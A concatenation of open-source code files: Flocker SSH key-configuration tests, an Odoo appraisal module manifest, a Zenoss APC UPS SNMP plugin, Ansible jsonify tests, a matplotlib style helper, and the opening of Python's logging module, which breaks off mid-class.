exc = self.assertRaises(CalledProcessError,
self.configure_ssh, b"127.0.0.1", port)
# There are different error messages on different platforms.
# On Linux the error may be:
# 'ssh: connect to host 127.0.0.1 port 34716: Connection refused\r\n'
# On OS X the error may be:
# 'ssh: connect to host 127.0.0.1 port 56711: Operation timed out\r\n'
self.assertTrue(b"refused" in exc.output or "Operation timed out" in
exc.output)
def test_authorized_keys(self):
"""
When the SSH connection is established, the ``~/.ssh/authorized_keys``
file has the public part of the generated key pair appended to it.
"""
configuring = deferToThread(
self.configure_ssh, self.server.ip, self.server.port)
def configured(ignored):
id_rsa_pub = self.ssh_config.child(b"id_rsa_flocker.pub")
keys = self.server.home.descendant([b".ssh", b"authorized_keys"])
# Compare the contents ignoring comments for ease.
self.assertEqual(goodlines(id_rsa_pub), goodlines(keys))
configuring.addCallback(configured)
return configuring
def test_authorized_keys_already_in_place(self):
"""
When the SSH connection is established, if the
``~/.ssh/authorized_keys`` file already has the public part of the key
pair then it is not appended again.
"""
configuring = deferToThread(
self.configure_ssh, self.server.ip, self.server.port)
configuring.addCallback(
lambda ignored:
deferToThread(
self.configure_ssh, self.server.ip, self.server.port))
def configured(ignored):
id_rsa_pub = self.ssh_config.child(b"id_rsa_flocker.pub")
keys = self.server.home.descendant([b".ssh", b"authorized_keys"])
self.assertEqual(goodlines(id_rsa_pub), goodlines(keys))
configuring.addCallback(configured)
return configuring
def test_existing_authorized_keys_preserved(self):
"""
Any unrelated content in the ``~/.ssh/authorized_keys`` file is left in
place by ``configure_ssh``.
"""
existing_keys = (
b"ssh-dss AAAAB3Nz1234567890 comment\n"
b"ssh-dss AAAAB3Nz0987654321 comment\n"
)
ssh_path = self.server.home.child(b".ssh")
ssh_path.makedirs()
authorized_keys = ssh_path.child(b"authorized_keys")
authorized_keys.setContent(existing_keys)
configuring = deferToThread(
self.configure_ssh, self.server.ip, self.server.port)
def configured(ignored):
self.assertIn(existing_keys, authorized_keys.getContent())
configuring.addCallback(configured)
return configuring
def test_flocker_keypair_written(self):
"""
``configure_ssh`` writes the keypair to ``id_rsa_flocker`` and
``id_rsa_flocker.pub`` remotely.
"""
configuring = deferToThread(
self.configure_ssh, self.server.ip, self.server.port)
def configured(ignored):
expected = (
self.ssh_config.child(b"id_rsa_flocker").getContent(),
self.ssh_config.child(b"id_rsa_flocker.pub").getContent()
)
actual = (
self.flocker_config.child(b"id_rsa_flocker").getContent(),
self.flocker_config.child(b"id_rsa_flocker.pub").getContent()
)
self.assertEqual(expected, actual)
configuring.addCallback(configured)
return configuring
def test_flocker_keypair_permissions(self):
"""
``configure_ssh`` writes the remote keypair with secure permissions.
"""
configuring = deferToThread(
self.configure_ssh, self.server.ip, self.server.port)
expected_private_key_permissions = Permissions(0600)
expected_public_key_permissions = Permissions(0644)
def configured(ignored):
expected = (
expected_private_key_permissions,
expected_public_key_permissions
)
actual = (
self.flocker_config.child(b"id_rsa_flocker").getPermissions(),
self.flocker_config.child(
b"id_rsa_flocker.pub").getPermissions()
)
self.assertEqual(expected, actual)
configuring.addCallback(configured)
return configuring
class CreateKeyPairTests(TestCase):
"""
Tests for ``create_keypair``.
"""
@if_conch
def test_key_generated(self):
"""
``create_keypair`` generates a new key pair and writes it locally to
``id_rsa_flocker`` and ``id_rsa_flocker.pub``.
"""
ssh_config = FilePath(self.mktemp())
configurator = OpenSSHConfiguration(
ssh_config_path=ssh_config, flocker_path=None)
configurator.create_keypair()
id_rsa = ssh_config.child(b"id_rsa_flocker")
id_rsa_pub = ssh_config.child(b"id_rsa_flocker.pub")
key = Key.fromFile(id_rsa.path)
self.assertEqual(
# Avoid comparing the comment
key.public().toString(
type="OPENSSH", extra='test comment').split(None, 2)[:2],
id_rsa_pub.getContent().split(None, 2)[:2])
@if_conch
def test_key_not_regenerated(self):
"""
``create_keypair`` does not generate a new key pair if one can
already be found in ``id_rsa_flocker`` and ``id_rsa_flocker.pub``.
"""
ssh_config = FilePath(self.mktemp())
configurator = OpenSSHConfiguration(
ssh_config_path=ssh_config, flocker_path=None)
id_rsa = ssh_config.child(b"id_rsa_flocker")
configurator.create_keypair()
expected_key = Key.fromFile(id_rsa.path)
configurator.create_keypair()
self.assertEqual(expected_key, Key.fromFile(id_rsa.path))
def test_key_permissions(self):
"""
``create_keypair`` sets secure permissions on
``id_rsa_flocker`` and ``id_rsa_flocker.pub``.
"""
ssh_config = FilePath(self.mktemp())
configurator = OpenSSHConfiguration(
ssh_config_path=ssh_config, flocker_path=None)
configurator.create_keypair()
expected_private_key_permissions = Permissions(0600)
expected_public_key_permissions = Permissions(0644)
id_rsa = ssh_config.child(b"id_rsa_flocker")
id_rsa_pub = ssh_config.child(b"id_rsa_flocker.pub")
self.assertEqual(
(expected_private_key_permissions,
expected_public_key_permissions),
(id_rsa.getPermissions(), id_rsa_pub.getPermissions()))
class OpenSSHDefaultsTests(TestCase):
"""
Tests for `OpenSSHConfiguration.defaults``.
"""
def test_flocker_path(self):
"""
``OpenSSHConfiguration.defaults`` creates an instance with
``/etc/flocker`` as the Flocker configuration path.
"""
self.assertEqual(
FilePath(b"/etc/flocker"),
OpenSSHConfiguration.defaults().flocker_path)
def test_ssh_config_path(self):
"""
``OpenSSHConfiguration.defaults`` creates an instance with the current
user's SSH configuration path as the SSH configuration path.
"""
expected = FilePath(expanduser(b"~")).child(b".ssh")
self.assertEqual(
expected, OpenSSHConfiguration.defaults().ssh_config_path)
def test_configure_ssh(self):
"""
``configure_ssh`` is taken from an ``OpenSSHConfiguration`` instance
created using the ``defaults`` method.
"""
self.assertEqual(
OpenSSHConfiguration.defaults().configure_ssh, configure_ssh)
| apache-2.0 |
vrenaville/OCB | addons/hr_evaluation/__openerp__.py | 53 | 3305 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Employee Appraisals',
'version': '0.1',
'author': 'OpenERP SA',
'category': 'Human Resources',
'sequence': 31,
'website': 'https://www.odoo.com/page/appraisal',
'summary': 'Periodical Evaluations, Appraisals, Surveys',
'images': ['images/hr_evaluation_analysis.jpeg',
'images/hr_evaluation.jpeg',
'images/hr_interview_requests.jpeg'],
'depends': ['hr', 'calendar', 'survey'],
'description': """
Periodical Employees evaluation and appraisals
==============================================
By using this application you can maintain the motivational process by doing periodical evaluations of your employees' performance. The regular assessment of human resources can benefit your people as well your organization.
An evaluation plan can be assigned to each employee. These plans define the frequency and the way you manage your periodic personal evaluations. You will be able to define steps and attach interview forms to each step.
Manages several types of evaluations: bottom-up, top-down, self-evaluations and the final evaluation by the manager.
Key Features
------------
* Ability to create employees evaluations.
* An evaluation can be created by an employee for subordinates, juniors as well as his manager.
* The evaluation is done according to a plan in which various surveys can be created. Each survey can be answered by a particular level in the employees hierarchy. The final review and evaluation is done by the manager.
* Every evaluation filled by employees can be viewed in a PDF form.
* Interview Requests are generated automatically by OpenERP according to employees evaluation plans. Each user receives automatic emails and requests to perform a periodical evaluation of their colleagues.
""",
"data": [
'security/ir.model.access.csv',
'security/hr_evaluation_security.xml',
'hr_evaluation_view.xml',
'report/hr_evaluation_report_view.xml',
'survey_data_appraisal.xml',
'hr_evaluation_data.xml',
'hr_evaluation_installer.xml',
],
"demo": ["hr_evaluation_demo.xml"],
# 'test': [
# 'test/test_hr_evaluation.yml',
# 'test/hr_evalution_demo.yml',
# ],
'auto_install': False,
'installable': True,
'application': True,
}
| agpl-3.0 |
anksp21/Community-Zenpacks | ZenPacks.ZenSystems.ApcUps/ZenPacks/ZenSystems/ApcUps/modeler/plugins/ApcUpsDeviceMap.py | 2 | 2850 | ##########################################################################
# Author: Jane Curry, [email protected]
# Date: March 28th, 2011
# Revised:
#
# ApcUpsDevice modler plugin
#
# This program can be used under the GNU General Public License version 2
# You can find full information here: http://www.zenoss.com/oss
#
##########################################################################
__doc__ = """ApcUpsDeviceMap
Gather information from APC UPS devices.
"""
from Products.DataCollector.plugins.CollectorPlugin import SnmpPlugin, GetMap
from Products.DataCollector.plugins.DataMaps import MultiArgs
import re
class ApcUpsDeviceMap(SnmpPlugin):
maptype = "ApcUpsDeviceMap"
snmpGetMap = GetMap({
'.1.3.6.1.4.1.318.1.1.1.1.1.1.0': 'setHWProductKey',
'.1.3.6.1.4.1.318.1.1.1.1.2.1.0': 'setOSProductKey',
'.1.3.6.1.4.1.318.1.1.1.1.2.3.0': 'setHWSerialNumber',
'.1.3.6.1.4.1.318.1.1.1.2.2.5.0': 'numBatteryPacks',
'.1.3.6.1.4.1.318.1.1.1.2.2.6.0': 'numBadBatteryPacks',
'.1.3.6.1.4.1.318.1.1.1.4.1.1.0': 'basicOutputStatus',
})
def condition(self, device, log):
"""only for boxes with proper object id
"""
return device.snmpOid.startswith(".1.3.6.1.4.1.318.1.3.2")
def process(self, device, results, log):
"""collect snmp information from this device"""
log.info('processing %s for device %s', self.name(), device.id)
getdata, tabledata = results
om = self.objectMap(getdata)
manufacturer = "American Power Conversion Corp."
om.setHWProductKey = MultiArgs(om.setHWProductKey, manufacturer)
# log.debug("HWProductKey=%s Manufacturer = %s" % (om.setHWProductKey, manufacturer))
om.setOSProductKey = MultiArgs(om.setOSProductKey, manufacturer)
# log.debug("OSProductKey=%s Manufacturer = %s" % (om.setOSProductKey, manufacturer))
if (om.basicOutputStatus < 1 or om.basicOutputStatus > 12):
om.basicOutputStatus = 1
index = om.basicOutputStatus
om.basicOutputStatusText = self.basicOutputStatusMap[index]
return om
basicOutputStatusMap = { 1: 'Unknown',
2: 'onLine',
3: 'onBattery',
4: 'onSmartBoost',
5: 'timedSleeping',
6: 'softwareBypass',
7: 'off',
8: 'rebooting',
9: 'switchedBypass',
10: 'hardwareFailureBypass',
11: 'sleepingUntilPowerReturn',
12: 'onSmartTrim',
}
| gpl-2.0 |
shepdelacreme/ansible | test/units/parsing/utils/test_jsonify.py | 113 | 1491 | # -*- coding: utf-8 -*-
# (c) 2016, James Cammarata <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat import unittest
from ansible.parsing.utils.jsonify import jsonify
class TestJsonify(unittest.TestCase):
def test_jsonify_simple(self):
self.assertEqual(jsonify(dict(a=1, b=2, c=3)), '{"a": 1, "b": 2, "c": 3}')
def test_jsonify_simple_format(self):
res = jsonify(dict(a=1, b=2, c=3), format=True)
cleaned = "".join([x.strip() for x in res.splitlines()])
self.assertEqual(cleaned, '{"a": 1,"b": 2,"c": 3}')
def test_jsonify_unicode(self):
self.assertEqual(jsonify(dict(toshio=u'くらとみ')), u'{"toshio": "くらとみ"}')
def test_jsonify_empty(self):
self.assertEqual(jsonify(None), '{}')
| gpl-3.0 |
sharthee/ProgrammingAssignment2 | labs/lab2/cs109style.py | 38 | 1293 | from __future__ import print_function
from IPython.core.display import HTML
from matplotlib import rcParams
#colorbrewer2 Dark2 qualitative color table
dark2_colors = [(0.10588235294117647, 0.6196078431372549, 0.4666666666666667),
(0.8509803921568627, 0.37254901960784315, 0.00784313725490196),
(0.4588235294117647, 0.4392156862745098, 0.7019607843137254),
(0.9058823529411765, 0.1607843137254902, 0.5411764705882353),
(0.4, 0.6509803921568628, 0.11764705882352941),
(0.9019607843137255, 0.6705882352941176, 0.00784313725490196),
(0.6509803921568628, 0.4627450980392157, 0.11372549019607843),
(0.4, 0.4, 0.4)]
def customize_mpl():
"""Tweak matplotlib visual style"""
print("Setting custom matplotlib visual style")
rcParams['figure.figsize'] = (10, 6)
rcParams['figure.dpi'] = 150
rcParams['axes.color_cycle'] = dark2_colors
rcParams['lines.linewidth'] = 2
rcParams['axes.grid'] = True
rcParams['axes.facecolor'] = '#eeeeee'
rcParams['font.size'] = 14
rcParams['patch.edgecolor'] = 'none'
def customize_css():
print("Setting custom CSS for the IPython Notebook")
styles = open('custom.css', 'r').read()
return HTML(styles)
| mit |
40223240/cadb_g3_0420 | static/Brython3.1.1-20150328-091302/Lib/logging/__init__.py | 733 | 66279 | # Copyright 2001-2013 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Logging package for Python. Based on PEP 282 and comments thereto in
comp.lang.python.
Copyright (C) 2001-2013 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging' and log away!
"""
import sys, os, time, io, traceback, warnings, weakref
from string import Template
__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',
'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',
'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',
'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',
'captureWarnings', 'critical', 'debug', 'disable', 'error',
'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',
'info', 'log', 'makeLogRecord', 'setLoggerClass', 'warn', 'warning',
'getLogRecordFactory', 'setLogRecordFactory', 'lastResort']
try:
import threading
except ImportError: #pragma: no cover
threading = None
__author__ = "Vinay Sajip <[email protected]>"
__status__ = "production"
__version__ = "0.5.1.2"
__date__ = "07 February 2010"
#---------------------------------------------------------------------------
# Miscellaneous module data
#---------------------------------------------------------------------------
#
# _srcfile is used when walking the stack to check when we've got the first
# caller stack frame.
#
if hasattr(sys, 'frozen'): #support for py2exe
_srcfile = "logging%s__init__%s" % (os.sep, __file__[-4:])
else:
_srcfile = __file__
_srcfile = os.path.normcase(_srcfile)
if hasattr(sys, '_getframe'):
currentframe = lambda: sys._getframe(3)
else: #pragma: no cover
def currentframe():
"""Return the frame object for the caller's stack frame."""
try:
raise Exception
except:
return sys.exc_info()[2].tb_frame.f_back
# _srcfile is only used in conjunction with sys._getframe().
# To provide compatibility with older versions of Python, set _srcfile
# to None if _getframe() is not available; this value will prevent
# findCaller() from being called.
#if not hasattr(sys, "_getframe"):
# _srcfile = None
#
#_startTime is used as the base when calculating the relative time of events
#
_startTime = time.time()
#
#raiseExceptions is used to see if exceptions during handling should be
#propagated
#
raiseExceptions = True
#
# If you don't want threading information in the log, set this to zero
#
logThreads = True
#
# If you don't want multiprocessing information in the log, set this to zero
#
logMultiprocessing = True
#
# If you don't want process information in the log, set this to zero
#
logProcesses = True
#---------------------------------------------------------------------------
# Level related stuff
#---------------------------------------------------------------------------
#
# Default levels and level names, these can be replaced with any positive set
# of values having corresponding names. There is a pseudo-level, NOTSET, which
# is only really there as a lower limit for user-defined levels. Handlers and
# loggers are initialized with NOTSET so that they will log all messages, even
# at user-defined levels.
#
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
_levelNames = {
CRITICAL : 'CRITICAL',
ERROR : 'ERROR',
WARNING : 'WARNING',
INFO : 'INFO',
DEBUG : 'DEBUG',
NOTSET : 'NOTSET',
'CRITICAL' : CRITICAL,
'ERROR' : ERROR,
'WARN' : WARNING,
'WARNING' : WARNING,
'INFO' : INFO,
'DEBUG' : DEBUG,
'NOTSET' : NOTSET,
}
def getLevelName(level):
"""
Return the textual representation of logging level 'level'.
If the level is one of the predefined levels (CRITICAL, ERROR, WARNING,
INFO, DEBUG) then you get the corresponding string. If you have
associated levels with names using addLevelName then the name you have
associated with 'level' is returned.
If a numeric value corresponding to one of the defined levels is passed
in, the corresponding string representation is returned.
Otherwise, the string "Level %s" % level is returned.
"""
return _levelNames.get(level, ("Level %s" % level))
def addLevelName(level, levelName):
"""
Associate 'levelName' with 'level'.
This is used when converting levels to text during message formatting.
"""
_acquireLock()
try: #unlikely to cause an exception, but you never know...
_levelNames[level] = levelName
_levelNames[levelName] = level
finally:
_releaseLock()
def _checkLevel(level):
if isinstance(level, int):
rv = level
elif str(level) == level:
if level not in _levelNames:
raise ValueError("Unknown level: %r" % level)
rv = _levelNames[level]
else:
raise TypeError("Level not an integer or a valid string: %r" % level)
return rv
#---------------------------------------------------------------------------
# Thread-related stuff
#---------------------------------------------------------------------------
#
#_lock is used to serialize access to shared data structures in this module.
#This needs to be an RLock because fileConfig() creates and configures
#Handlers, and so might arbitrary user threads. Since Handler code updates the
#shared dictionary _handlers, it needs to acquire the lock. But if configuring,
#the lock would already have been acquired - so we need an RLock.
#The same argument applies to Loggers and Manager.loggerDict.
#
if threading:
_lock = threading.RLock()
else: #pragma: no cover
_lock = None
def _acquireLock():
"""
Acquire the module-level lock for serializing access to shared data.
This should be released with _releaseLock().
"""
if _lock:
_lock.acquire()
def _releaseLock():
"""
Release the module-level lock acquired by calling _acquireLock().
"""
if _lock:
_lock.release()
#---------------------------------------------------------------------------
# The logging record
#---------------------------------------------------------------------------
class LogRecord(object):
"""
A LogRecord instance represents an event being logged.
LogRecord instances are created every time something is logged. They
contain all the information pertinent to the event being logged. The
main information passed in is in msg and args, which are combined
using str(msg) % args to create the message field of the record. The
record also includes information such as when the record was created,
the source line where the logging call was made, and any exception
information to be logged.
"""
def __init__(self, name, level, pathname, lineno,
msg, args, exc_info, func=None, sinfo=None, **kwargs):
"""
Initialize a logging record with interesting information.
"""
ct = time.time()
self.name = name
self.msg = msg
#
# The following statement allows passing of a dictionary as a sole
# argument, so that you can do something like
# logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2})
# Suggested by Stefan Behnel.
# Note that without the test for args[0], we get a problem because
# during formatting, we test to see if the arg is present using
# 'if self.args:'. If the event being logged is e.g. 'Value is %d'
# and if the passed arg fails 'if self.args:' then no formatting
# is done. For example, logger.warning('Value is %d', 0) would log
# 'Value is %d' instead of 'Value is 0'.
# For the use case of passing a dictionary, this should not be a
# problem.
if args and len(args) == 1 and isinstance(args[0], dict) and args[0]:
args = args[0]
self.args = args
self.levelname = getLevelName(level)
self.levelno = level
self.pathname = pathname
try:
self.filename = os.path.basename(pathname)
self.module = os.path.splitext(self.filename)[0]
except (TypeError, ValueError, AttributeError):
self.filename = pathname
self.module = "Unknown module"
self.exc_info = exc_info
self.exc_text = None # used to cache the traceback text
self.stack_info = sinfo
self.lineno = lineno
self.funcName = func
self.created = ct
self.msecs = (ct - int(ct)) * 1000
self.relativeCreated = (self.created - _startTime) * 1000
if logThreads and threading:
self.thread = threading.get_ident()
self.threadName = threading.current_thread().name
else: # pragma: no cover
self.thread = None
self.threadName = None
if not logMultiprocessing: # pragma: no cover
self.processName = None
else:
self.processName = 'MainProcess'
mp = sys.modules.get('multiprocessing')
if mp is not None:
# Errors may occur if multiprocessing has not finished loading
# yet - e.g. if a custom import hook causes third-party code
# to run when multiprocessing calls import. See issue 8200
# for an example
try:
self.processName = mp.current_process().name
except Exception: #pragma: no cover
pass
if logProcesses and hasattr(os, 'getpid'):
self.process = os.getpid()
else:
self.process = None
def __str__(self):
return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno,
self.pathname, self.lineno, self.msg)
def getMessage(self):
"""
Return the message for this LogRecord.
Return the message for this LogRecord after merging any user-supplied
arguments with the message.
"""
msg = str(self.msg)
if self.args:
msg = msg % self.args
return msg
#
# Determine which class to use when instantiating log records.
#
_logRecordFactory = LogRecord
def setLogRecordFactory(factory):
"""
Set the factory to be used when instantiating a log record.
:param factory: A callable which will be called to instantiate
a log record.
"""
global _logRecordFactory
_logRecordFactory = factory
def getLogRecordFactory():
"""
Return the factory to be used when instantiating a log record.
"""
return _logRecordFactory
def makeLogRecord(dict):
"""
Make a LogRecord whose attributes are defined by the specified dictionary,
This function is useful for converting a logging event received over
a socket connection (which is sent as a dictionary) into a LogRecord
instance.
"""
rv = _logRecordFactory(None, None, "", 0, "", (), None, None)
rv.__dict__.update(dict)
return rv
#---------------------------------------------------------------------------
# Formatter classes and functions
#---------------------------------------------------------------------------
class PercentStyle(object):
default_format = '%(message)s'
asctime_format = '%(asctime)s'
asctime_search = '%(asctime)'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
def usesTime(self):
return self._fmt.find(self.asctime_search) >= 0
def format(self, record):
return self._fmt % record.__dict__
class StrFormatStyle(PercentStyle):
default_format = '{message}'
asctime_format = '{asctime}'
asctime_search = '{asctime'
def format(self, record):
return self._fmt.format(**record.__dict__)
class StringTemplateStyle(PercentStyle):
default_format = '${message}'
asctime_format = '${asctime}'
asctime_search = '${asctime}'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
self._tpl = Template(self._fmt)
def usesTime(self):
fmt = self._fmt
return fmt.find('$asctime') >= 0 or fmt.find(self.asctime_format) >= 0
def format(self, record):
return self._tpl.substitute(**record.__dict__)
_STYLES = {
'%': PercentStyle,
'{': StrFormatStyle,
'$': StringTemplateStyle
}
class Formatter(object):
"""
Formatter instances are used to convert a LogRecord to text.
Formatters need to know how a LogRecord is constructed. They are
responsible for converting a LogRecord to (usually) a string which can
be interpreted by either a human or an external system. The base Formatter
allows a formatting string to be specified. If none is supplied, the
default value of "%s(message)" is used.
The Formatter can be initialized with a format string which makes use of
knowledge of the LogRecord attributes - e.g. the default value mentioned
above makes use of the fact that the user's message and arguments are pre-
formatted into a LogRecord's message attribute. Currently, the useful
attributes in a LogRecord are described by:
%(name)s Name of the logger (logging channel)
%(levelno)s Numeric logging level for the message (DEBUG, INFO,
WARNING, ERROR, CRITICAL)
%(levelname)s Text logging level for the message ("DEBUG", "INFO",
"WARNING", "ERROR", "CRITICAL")
%(pathname)s Full pathname of the source file where the logging
call was issued (if available)
%(filename)s Filename portion of pathname
%(module)s Module (name portion of filename)
%(lineno)d Source line number where the logging call was issued
(if available)
%(funcName)s Function name
%(created)f Time when the LogRecord was created (time.time()
return value)
%(asctime)s Textual time when the LogRecord was created
%(msecs)d Millisecond portion of the creation time
%(relativeCreated)d Time in milliseconds when the LogRecord was created,
relative to the time the logging module was loaded
(typically at application startup time)
%(thread)d Thread ID (if available)
%(threadName)s Thread name (if available)
%(process)d Process ID (if available)
%(message)s The result of record.getMessage(), computed just as
the record is emitted
"""
converter = time.localtime
def __init__(self, fmt=None, datefmt=None, style='%'):
"""
Initialize the formatter with specified format strings.
Initialize the formatter either with the specified format string, or a
default as described above. Allow for specialized date formatting with
the optional datefmt argument (if omitted, you get the ISO8601 format).
Use a style parameter of '%', '{' or '$' to specify that you want to
use one of %-formatting, :meth:`str.format` (``{}``) formatting or
:class:`string.Template` formatting in your format string.
.. versionchanged: 3.2
Added the ``style`` parameter.
"""
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
self._style = _STYLES[style](fmt)
self._fmt = self._style._fmt
self.datefmt = datefmt
default_time_format = '%Y-%m-%d %H:%M:%S'
default_msec_format = '%s,%03d'
def formatTime(self, record, datefmt=None):
"""
Return the creation time of the specified LogRecord as formatted text.
This method should be called from format() by a formatter which
wants to make use of a formatted time. This method can be overridden
in formatters to provide for any specific requirement, but the
basic behaviour is as follows: if datefmt (a string) is specified,
it is used with time.strftime() to format the creation time of the
record. Otherwise, the ISO8601 format is used. The resulting
string is returned. This function uses a user-configurable function
to convert the creation time to a tuple. By default, time.localtime()
is used; to change this for a particular formatter instance, set the
'converter' attribute to a function with the same signature as
time.localtime() or time.gmtime(). To change it for all formatters,
for example if you want all logging times to be shown in GMT,
set the 'converter' attribute in the Formatter class.
"""
ct = self.converter(record.created)
if datefmt:
s = time.strftime(datefmt, ct)
else:
t = time.strftime(self.default_time_format, ct)
s = self.default_msec_format % (t, record.msecs)
return s
def formatException(self, ei):
"""
Format and return the specified exception information as a string.
This default implementation just uses
traceback.print_exception()
"""
sio = io.StringIO()
tb = ei[2]
# See issues #9427, #1553375. Commented out for now.
#if getattr(self, 'fullstack', False):
# traceback.print_stack(tb.tb_frame.f_back, file=sio)
traceback.print_exception(ei[0], ei[1], tb, None, sio)
s = sio.getvalue()
sio.close()
if s[-1:] == "\n":
s = s[:-1]
return s
def usesTime(self):
"""
Check if the format uses the creation time of the record.
"""
return self._style.usesTime()
def formatMessage(self, record):
return self._style.format(record)
def formatStack(self, stack_info):
"""
This method is provided as an extension point for specialized
formatting of stack information.
The input data is a string as returned from a call to
:func:`traceback.print_stack`, but with the last trailing newline
removed.
The base implementation just returns the value passed in.
"""
return stack_info
def format(self, record):
"""
Format the specified record as text.
The record's attribute dictionary is used as the operand to a
string formatting operation which yields the returned string.
Before formatting the dictionary, a couple of preparatory steps
are carried out. The message attribute of the record is computed
using LogRecord.getMessage(). If the formatting string uses the
time (as determined by a call to usesTime(), formatTime() is
called to format the event time. If there is exception information,
it is formatted using formatException() and appended to the message.
"""
record.message = record.getMessage()
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
s = self.formatMessage(record)
if record.exc_info:
# Cache the traceback text to avoid converting it multiple times
# (it's constant anyway)
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
if s[-1:] != "\n":
s = s + "\n"
s = s + record.exc_text
if record.stack_info:
if s[-1:] != "\n":
s = s + "\n"
s = s + self.formatStack(record.stack_info)
return s
#
# The default formatter to use when no other is specified
#
_defaultFormatter = Formatter()
class BufferingFormatter(object):
"""
A formatter suitable for formatting a number of records.
"""
def __init__(self, linefmt=None):
"""
Optionally specify a formatter which will be used to format each
individual record.
"""
if linefmt:
self.linefmt = linefmt
else:
self.linefmt = _defaultFormatter
def formatHeader(self, records):
"""
Return the header string for the specified records.
"""
return ""
def formatFooter(self, records):
"""
Return the footer string for the specified records.
"""
return ""
def format(self, records):
"""
Format the specified records and return the result as a string.
"""
rv = ""
if len(records) > 0:
rv = rv + self.formatHeader(records)
for record in records:
rv = rv + self.linefmt.format(record)
rv = rv + self.formatFooter(records)
return rv
#---------------------------------------------------------------------------
# Filter classes and functions
#---------------------------------------------------------------------------
class Filter(object):
"""
Filter instances are used to perform arbitrary filtering of LogRecords.
Loggers and Handlers can optionally use Filter instances to filter
records as desired. The base filter class only allows events which are
below a certain point in the logger hierarchy. For example, a filter
initialized with "A.B" will allow events logged by loggers "A.B",
"A.B.C", "A.B.C.D", "A.B.D" etc. but not "A.BB", "B.A.B" etc. If
initialized with the empty string, all events are passed.
"""
def __init__(self, name=''):
"""
Initialize a filter.
Initialize with the name of the logger which, together with its
children, will have its events allowed through the filter. If no
name is specified, allow every event.
"""
self.name = name
self.nlen = len(name)
def filter(self, record):
"""
Determine if the specified record is to be logged.
Is the specified record to be logged? Returns 0 for no, nonzero for
yes. If deemed appropriate, the record may be modified in-place.
"""
if self.nlen == 0:
return True
elif self.name == record.name:
return True
elif record.name.find(self.name, 0, self.nlen) != 0:
return False
return (record.name[self.nlen] == ".")
class Filterer(object):
"""
A base class for loggers and handlers which allows them to share
common code.
"""
def __init__(self):
"""
Initialize the list of filters to be an empty list.
"""
self.filters = []
def addFilter(self, filter):
"""
Add the specified filter to this handler.
"""
if not (filter in self.filters):
self.filters.append(filter)
def removeFilter(self, filter):
"""
Remove the specified filter from this handler.
"""
if filter in self.filters:
self.filters.remove(filter)
def filter(self, record):
"""
Determine if a record is loggable by consulting all the filters.
The default is to allow the record to be logged; any filter can veto
this and the record is then dropped. Returns a zero value if a record
is to be dropped, else non-zero.
.. versionchanged: 3.2
Allow filters to be just callables.
"""
rv = True
for f in self.filters:
if hasattr(f, 'filter'):
result = f.filter(record)
else:
result = f(record) # assume callable - will raise if not
if not result:
rv = False
break
return rv
#---------------------------------------------------------------------------
# Handler classes and functions
#---------------------------------------------------------------------------
_handlers = weakref.WeakValueDictionary() #map of handler names to handlers
_handlerList = [] # added to allow handlers to be removed in reverse of order initialized
def _removeHandlerRef(wr):
"""
Remove a handler reference from the internal cleanup list.
"""
# This function can be called during module teardown, when globals are
# set to None. If _acquireLock is None, assume this is the case and do
# nothing.
if (_acquireLock is not None and _handlerList is not None and
_releaseLock is not None):
_acquireLock()
try:
if wr in _handlerList:
_handlerList.remove(wr)
finally:
_releaseLock()
def _addHandlerRef(handler):
"""
Add a handler to the internal cleanup list using a weak reference.
"""
_acquireLock()
try:
_handlerList.append(weakref.ref(handler, _removeHandlerRef))
finally:
_releaseLock()
class Handler(Filterer):
"""
